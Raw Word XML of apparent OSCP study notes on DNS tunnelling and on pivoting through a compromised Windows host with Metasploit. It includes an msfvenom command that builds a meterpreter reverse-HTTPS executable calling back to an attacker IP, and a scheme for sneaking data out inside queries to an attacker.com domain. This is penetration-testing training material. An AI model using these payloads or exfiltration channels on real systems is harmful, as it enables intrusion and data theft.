        <w:t xml:space="preserve">OSCP 20.2. DNS Tunneling Theory and Practice</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t xml:space="preserve">We use it when Firewall allows UDP/53 (DNS)</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t xml:space="preserve">And you also need a DNS server to be present (with port 53 open) in order to do DNS tunneling</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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Machines Involved:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim Machine (Client)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – inside a restricted network with no outbound access except DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Resolver (Middleman)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – often an internal or ISP DNS server that forwards DNS queries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker-Controlled DNS Server (usually your own Kali Machine) (Authoritative Server)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – controlled by you (e.g., Kali), set up for a domain like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You run dnsmasq, dnscat2-server, or bind9 on your Kali machine, listening on UDP port 53.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You register a domain (like attacker.com) and configure it to point to your Kali’s public IP as the authoritative server for that domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When the victim makes a DNS request (e.g., data123.attacker.com), the DNS resolver eventually sends it to your Kali box.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali receives the query and extracts the payload from the subdomain (data123).</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Works (Simplified Flow):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim sends a DNS query</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a domain like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data123.attacker.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Resolver forwards the query</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the DNS hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Query reaches your DNS server (which is your kali machin)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (authoritative for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You extract the data</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data123</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) embedded in the subdomain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Optional)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: You reply with a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TXT record or IP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send data </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">back</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B39">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B3A">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In short:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B3B">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The victim sneaks data out inside DNS queries. Your DNS server receives them and extracts the data.</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F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8ccsnocegsk2" w:id="96"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivoting with Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B40">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A real-life example of this was seen in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 27.4.2. Services and Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used multi/manage/autoroute to add route to Metasploit's Route Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They then set up SOCKS Proxy on Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then used Proxychains on each command to make it run through proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used a variety of tools with proxychains, which is cool to see</w:t>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t xml:space="preserve">We are pivoting on Windows Machines. Our Kali is currently only in the 192 subnet.</w:t>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t xml:space="preserve">This requires that a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit METERPRETER session is currently inside of a compromised machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. A simple shell inside of metasploit won't work. So make sure to either upgrade to meterpreter, or catch a meterpreter reverse shell payload</w:t>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t xml:space="preserve">You can look at </w:t>
      </w:r>
      <w:hyperlink w:anchor="_7ta5x79p1511">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> "How to upgrade from a weak shell to a meterpreter" section to learn how to upgrade from shell to meterpreter</w:t>
      </w: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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4896449" cy="3460471"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80" name="image79.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image79.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId241"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4896449" cy="3460471"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that this machine is dual-homed, connected to two network interfaces: Ethernet0 and Ethernet1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we see the two IP addresses</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t xml:space="preserve">So, we want to be able to access the 172 subnet from our Kali. And we can pivot using Metasploit. </w:t>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t xml:space="preserve">We can try to identify other live hosts on this second network by leveraging methods from active information gathering. Before we do so, let's start a Meterpreter shell on our compromised target by downloading and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">executing met.exe as well as starting the corresponding multi/handler as we did before</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is met.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="440"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.119.4 LPORT=443 -f exe -o met.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1447800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="572" name="image546.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image546.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId242"/>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d4gxdy7sajoe" w:id="97"/>
      <w:bookmarkEnd w:id="97"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Route Add</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Now that we have a working session on the compromised system, we can background it. To add a route to a network reachable through a compromised host, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the network information and session ID that the route applies to. After adding the route, we can display the current routes with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route print</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4491038" cy="2734927"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="129" name="image125.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image125.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId243"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4491038" cy="2734927"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bg</w:t>
      </w:r>
    </w:p>
